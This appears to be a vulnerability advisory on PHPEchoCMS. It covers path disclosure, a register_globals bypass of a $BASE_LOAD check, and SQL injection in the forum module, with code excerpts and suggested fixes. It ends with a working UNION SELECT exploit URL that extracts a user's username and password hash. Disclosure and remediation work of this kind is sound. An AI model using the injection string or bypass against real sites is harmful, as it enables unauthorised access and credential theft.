Hello,

PHPEchoCMS: multiple remote vulnerabilities


Discovered By : HACKERS PAL

Copy rights : HACKERS PAL

Website : http://www.soqor.net

Email Address : [EMAIL PROTECTED]



First: full path disclosure

Requesting the following files directly discloses the full filesystem path of the installation:

kernel/init.php

modules/admin/index.php

..

Second: direct-access check bypassed through register_globals

Every file that is meant to be included only by the loader checks the value of the variable $BASE_LOAD before it runs. With register_globals on, that variable can be set from the query string:

modules/files/index.php?BASE_LOAD=1

The file then continues executing as if it had been included, and the same works for the other module files. (The usual fix is to have the loader define a constant and test it with defined(), which a request variable cannot satisfy.)


modules/forum/index.php

lines [31-49]

    if (@$_POST['post']=='thread')
    {
        if (@$_POST['id'] && $_POST['title'] && $_POST['contents'])
        {
            // Add the thread to the specified section
            $ins = "INSERT INTO `".PREFIX."threads` VALUES ('', "
                 . "'".addslashes($_POST['id'])."', '-1', "
                 . "'".addslashes($_POST['title'])."', "
                 . "'".str_replace("\n", "<br>", addslashes($_POST['contents']))."', "
                 . "'".$_SESSION['username']."', "
                 . "'".date("d-m-Y H:i")."', '0')";
            $res = query($ins, 1);
            $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE `id`=".addslashes($_POST['id']);
            $res = query($ins, 1);
            $nb = query("SELECT max(`id`) FROM `".PREFIX."threads`", 2);
            redirect ("index.php?module=forum&show=thread&id=".$nb);
        }
        else
        {
            $content = $mlang['017'];
        }
    }


Look at the UPDATE:

              $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE `id`=".addslashes($_POST['id']);

$_POST['id'] is concatenated into the WHERE clause without quotes. addslashes() only escapes quotes, backslashes and NUL bytes, so a value that contains none of them passes through untouched and the attacker controls the rest of the WHERE condition. Posting, for example,

id=1 OR 1=1

rewrites `lastdate` for every section instead of the one named. (The date() value is concatenated unquoted as well, so this statement is malformed as written and needs quoting or binding too.) A payload of the form `union update members set password=... where id=1` does not work at this sink: UNION only joins SELECT statements, and a single mysql_query() call executes one statement, so what can be injected here is limited to what fits inside the UPDATE's own WHERE condition. The intval() treatment given below for the thread view, or better a bound parameter, is the fix for $_POST['id'] here as well.



lines 138-142:

    elseif (@$_GET['show']=='thread' && $_GET['id'])
    {
        // Show a thread and its replies (child-threads)
        $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id=".addslashes($_GET['id']), 4);

Here too $_GET['id'] lands in the query unquoted, so addslashes() offers no protection and a UNION SELECT can be appended. Replace with:

    elseif (@$_GET['show']=='thread' && $_GET['id'])
    {
        // Show a thread and its replies (child-threads)
        $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id='".intval($_GET['id'])."'", 4);



Exploit (returns the username and password hash of user 1 in place of a thread; the injected SELECT must supply the same eight columns as `threads`, the table name assumes PREFIX is phpecms_, and the trailing /* comments out whatever follows):

index.php?module=forum&show=thread&id=-1%20union%20select%201,2,3,username,password,username,password,8%20from%20phpecms_users%20where%20id=1/*




# WwW.SoQoR.NeT
